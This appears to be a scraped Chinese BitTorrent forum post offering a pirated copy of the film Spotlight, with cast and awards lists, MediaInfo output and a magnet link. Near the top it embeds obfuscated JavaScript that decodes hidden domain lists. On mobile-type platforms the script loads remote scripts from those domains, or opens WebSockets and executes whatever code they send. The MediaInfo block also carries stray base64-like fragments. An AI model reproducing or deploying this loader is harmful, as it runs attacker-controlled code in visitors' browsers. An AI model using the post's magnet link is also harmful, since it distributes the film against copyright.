聚焦[双语字幕]Spotlight.2015.1080p.BluRay.x264.DTS-迅雷下载 12.74GB

版主小s 17天前 146

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 聚焦 / 惊爆焦点(台) / 焦点追击(港)

◎片 名 Spotlight

◎年 代 2015

◎产 地 美国

◎类 别 剧情 / 传记

◎语 言 英语

◎上映日期 2015-09-03(威尼斯电影节) / 2015-11-25(美国)

◎IMDb评分 8.1/10 from 423888 users

◎IMDb链接 https://www.imdb.com/title/tt1895587

◎豆瓣评分 8.8/10 from 229480 users

◎豆瓣链接 https://movie.douban.com/subject/25954475/

◎片 长 128分钟

◎导 演 汤姆·麦卡锡 Tom McCarthy

◎编 剧 乔希·辛格 Josh Singer / 汤姆·麦卡锡 Tom McCarthy

◎主 演 马克·鲁弗洛 Mark Ruffalo

迈克尔·基顿 Michael Keaton

瑞秋·麦克亚当斯 Rachel McAdams

列维·施瑞博尔 Liev Schreiber

约翰·斯拉特里 John Slattery

布莱恩·达西·詹姆斯 Brian d'Arcy James

斯坦利·图齐 Stanley Tucci

比利·克鲁德普 Billy Crudup

保罗·吉尔福伊尔 Paul Guilfoyle

杰米·谢尔丹 Jamey Sheridan

兰·卡琉 Len Cariou

尼尔·哈夫 Neal Huff

迈克尔·西里尔·克赖顿 Michael Cyril Creighton

迈克尔·康特里曼 Michael Countryman

马丁·罗奇 Martin Roach

伊莲娜·郁安科 Elena Juatco

理查德·詹金斯 Richard Jenkins

弗瑞斯特·韦伯 Forrest Weber

◎标 签 美国 | 媒体 | 宗教 | 剧情 | 人性 | 犯罪 | 传记 | 新闻

◎简 介

“聚焦”是波士顿环球报的一个专栏,罗比·罗宾森(迈克尔·基顿饰)是"聚焦"栏目的编辑,栏目拥有一个独立的调查小组,组员包括萨夏·菲弗(瑞秋·麦克亚当斯饰),迈克尔(马克·鲁弗洛饰),马特·卡罗尔(布莱恩·达西·詹姆斯饰)。当马蒂·巴伦(列维·施瑞博尔饰)接替了环球报的总编辑一职,他开始指派罗宾森和他的团队,紧跟一桩被雪藏已久的案件,一个天主教牧师性骚扰教区里的孩子。虽然最开始他们以为这只是个小任务,但很快他们就发现,其背后还隐藏一系列事件,涉及了上百名受害者,而教会已经私下赔偿了受害者,并派人掩盖了这些罪行。随着调查的越发深入,他们发现这一阴谋的更多证据,不仅仅是神职人员,就在波士顿以外,甚至全世界,都在上演着这种暴行。罗宾森和他的团队遭遇到了当地官员们的掣肘。教会内的,教会外的势力都在向他们施压,想让他们放弃这个案件。

◎获奖情况

第88届奥斯卡金像奖(2016)

最佳影片 迈克尔·休格 / 史蒂夫·戈林 / 妮可·罗克林 / 布莱·帕冈·福斯特

最佳导演(提名) 汤姆·麦卡锡

最佳男配角(提名) 马克·鲁弗洛

最佳女配角(提名) 瑞秋·麦克亚当斯

最佳原创剧本 乔希·辛格 / 汤姆·麦卡锡

最佳剪辑(提名) 汤姆·麦卡德尔

第72届威尼斯电影节(2015)

酷儿狮奖(提名) 汤姆·麦卡锡

布赖恩奖 汤姆·麦卡锡

银鼠奖 汤姆·麦卡锡

第73届金球奖(2016)

电影类 最佳剧情片(提名)

电影类 最佳导演(提名) 汤姆·麦卡锡

电影类 最佳编剧(提名) 乔希·辛格 / 汤姆·麦卡锡

第69届英国电影学院奖(2016)

电影奖 最佳影片(提名) 迈克尔·休格 / 史蒂夫·戈林 / 妮可·罗克林 / 布莱·帕冈·福斯特

电影奖 最佳男配角(提名) 马克·鲁弗洛

电影奖 最佳原创剧本 乔希·辛格 / 汤姆·麦卡锡

第68届美国导演工会奖(2016)

最佳电影导演(提名) 汤姆·麦卡锡

第22届美国演员工会奖(2016)

电影奖 最佳女配角(提名) 瑞秋·麦克亚当斯

电影奖 最佳群戏

第68届美国编剧工会奖(2016)

电影奖 最佳原创剧本 乔希·辛格 / 汤姆·麦卡锡

第27届美国制片人工会奖(2016)

最佳电影制片人奖(提名)

第81届纽约影评人协会奖(2015)

最佳男主角 迈克尔·基顿

第87届美国国家评论协会奖(2015)

年度佳片

第21届美国评论家选择电影奖(2016)

最佳影片

最佳导演(提名) 汤姆·麦卡锡

最佳男配角(提名) 马克·鲁弗洛

最佳女配角(提名) 瑞秋·麦克亚当斯

最佳群戏

最佳原创剧本 乔希·辛格 / 汤姆·麦卡锡

最佳剪辑(提名)

最佳配乐(提名)

第31届美国独立精神奖(2016)

最佳影片 史蒂夫·戈林 / 妮可·罗克林

最佳导演 汤姆·麦卡锡

最佳剧本 乔希·辛格 / 汤姆·麦卡锡

最佳剪辑 汤姆·麦卡德尔

罗伯特·奥特曼电影奖 保罗·吉尔福伊尔 / 斯坦利·图齐 / 比利·克鲁德普 / 汤姆·麦卡锡 / 迈克尔·基顿 / 列维·施瑞博尔 / 尼尔·哈夫 / 约翰·斯拉特里 / 瑞秋·麦克亚当斯 / 杰米·谢尔丹 / 马克·鲁弗洛 / 布莱恩·达西·詹姆斯

第25届哥谭独立电影奖(2015)

最佳影片

最佳群戏

最佳剧本 乔希·辛格 / 汤姆·麦卡锡

第16届美国电影学会奖(2015)

年度佳片

第20届金卫星奖(2016)

电影部门 最佳剧情片

电影部门 最佳导演 汤姆·麦卡锡

电影部门 最佳原创剧本

第19届好莱坞电影奖(2015)

年度编剧 乔希·辛格 / 汤姆·麦卡锡

第50届美国国家影评人协会奖(2016)

最佳影片 汤姆·麦卡锡

最佳剧本 乔希·辛格 / 汤姆·麦卡锡

第14届华盛顿影评人协会奖(2015)

最佳影片

最佳群戏

第36届波士顿影评人协会奖(2015)

最佳影片

最佳剧本

最佳群像表演

第41届洛杉矶影评人协会奖(2015)

最佳影片

最佳剧本

第28届芝加哥影评人协会奖(2015)

最佳原创剧本 乔希·辛格 / 汤姆·麦卡锡

第19届美国在线影评人协会奖(2015)

最佳影片(提名)

最佳导演(提名) 汤姆·麦卡锡

最佳男配角(提名) 马克·鲁弗洛

最佳原创剧本 乔希·辛格 / 汤姆·麦卡锡

第6届豆瓣电影鑫像奖(2016)

鑫豆单元 最佳影片(外语)(提名)

鑫豆单元 最佳导演(外语)(提名) 汤姆·麦卡锡

鑫豆单元 最佳男演员(外语)(提名) 马克·鲁弗洛

  1. General

  2. Unique ID : 322162942344800999045140875612950229550 (0xF25E53653A823A74B0A39536325DF22E)

  3. Complete name : Spotlight.2015.1080p.BluRay.x264.DTS-PTH.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 12.7 GiB

  7. Duration : 2 h 9 min

  8. Overall bit rate : 14.1 Mb/s

  9. Movie name : Spotlight

  10. Encoded date : UTC 2021-07-06 17:19:34

  11. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 2 h 9 min

  25. Bit rate : 12.5 Mb/s

  26. Width : 1 920 pixels

  27. Height : 1 036 pixels

  28. Display aspect ratio : 1.85:1

  29. Frame rate mode : Constant

  30. Frame rate : 23.976 (24000/1001/53354) FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.261

  36. Stream size : 11.2 GiB (88%)

  37. Writing library : x264 core 164 r3065+55M 280faca t_mod_New [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=24 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=18.0000 / qcomp=0.70 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.70 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Default : Yes

  40. Forced : No


  41. Audio

  42. ID : 2

  43. ID in the original source medium : 4352 (0x1100)

  44. Format : DTS

  45. Format/Info : Digital Theater Systems

  46. Codec ID : A_DTS

  47. Duration : 2 h 9 min

  48. Bit rate mode : Constant

  49. Bit rate : 1 509 kb/s

  50. Channel(s) : 6 channels

  51. Channel layout : C L R Ls Rs LFE

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 93.750 FPS (512 SPF)

  54. Bit depth : 24 bits

  55. Compression mode : Lossy

  56. Stream size : 1.36 GiB (11%)

  57. Language : English

  58. Default : Yes

  59. Forced : No

  60. Original source medium : Blu-ray


  61. Text #1

  62. ID : 3

  63. ID in the original source medium : 4611 (0x1203)

  64. Format : PGS

  65. Muxing mode : zlib

  66. Codec ID : S_HDMV/PGS

  67. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  68. Duration : 2 h 1 min

  69. Bit rate : 88.1 kb/s

  70. Count of elements : 3231

  71. Stream size : 76.3 MiB (1%)

  72. Title : chs&eng

  73. Language : Chinese

  74. Default : Yes

  75. Forced : No

  76. Original source medium : Blu-ray


  77. Text #2

  78. ID : 4

  79. ID in the original source medium : 4612 (0x1204)

  80. Format : PGS

  81. Muxing mode : zlib

  82. Codec ID : S_HDMV/PGS

  83. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  84. Duration : 2 h 1 min

  85. Bit rate : 88.6 kb/s

  86. Count of elements : 3221

  87. Stream size : 76.8 MiB (1%)

  88. Title : cht&eng

  89. Language : Chinese

  90. Default : No

  91. Forced : No

  92. Original source medium : Blu-ray


  93. Text #3

  94. ID : 5

  95. ID in the original source medium : 4613 (0x1205)

  96. Format : PGS

  97. Muxing mode : zlib

  98. Codec ID : S_HDMV/PGS

  99. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  100. Duration : 2 h 1 min

  101. Bit rate : 52.3 kb/s

  102. Count of elements : 3213

  103. Stream size : 45.3 MiB (0%)

  104. Title : chs

  105. Language : Chinese

  106. Default : No

  107. Forced : No

  108. Original source medium : Blu-ray


  109. Text #4

  110. ID : 6

  111. ID in the original source medium : 4614 (0x1206)

  112. Format : PGS

  113. Muxing mode : zlib

  114. Codec ID : S_HDMV/PGS

  115. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  116. Duration : 2 h 1 min

  117. Bit rate : 52.8 kb/s

  118. Count of elements : 3213

  119. Stream size : 45.8 MiB (0%)

  120. Title : cht

  121. Language : Chinese

  122. Default : No

  123. Forced : No

  124. Original source medium : Blu-ray


  125. Text #5

  126. ID : 7

  127. ID in the original source medium : 4608 (0x1200)

  128. Format : PGS

  129. Muxing mode : zlib

  130. Codec ID : S_HDMV/PGS

  131. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  132. Duration : 1 h 59 min

  133. Bit rate : 61.7 kb/s

  134. Count of elements : 4800

  135. Stream size : 52.6 MiB (0%)

  136. Title : eng

  137. Language : English

  138. Default : No

  139. Forced : No

  140. Original source medium : Blu-ray


  141. Menu

  142. 00:00:00.000 : Chapter 01

  143. 00:08:20.750 : Chapter 02

  144. 00:14:30.536 : Chapter 03

  145. 00:21:51.518 : Chapter 04

  146. 00:27:38.907 : Chapter 05

  147. 00:35:48.771 : Chapter 06

  148. 00:45:38.986 : Chapter 07

  149. 00:49:12.199 : Chapter 08

  150. 00:53:21.156 : Chapter 09

  151. 00:59:36.573 : Chapter 10

  152. 01:05:29.216 : Chapter 11

  153. 01:10:47.534 : Chapter 12

  154. 01:17:30.687 : Chapter 13

  155. 01:23:30.046 : Chapter 14

  156. 01:30:03.147 : Chapter 15

  157. 01:34:27.495 : Chapter 16

  158. 01:42:52.541 : Chapter 17

  159. 01:50:57.942 : Chapter 18

  160. 01:55:50.109 : Chapter 19

  161. 02:01:30.574 : Chapter 20


TAGS 剧情 传记

磁力链:
  • magnet:?xt=urn:btih:F6F0C6D7261EFCC636B60AEA744FBFFA51BE52C5
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回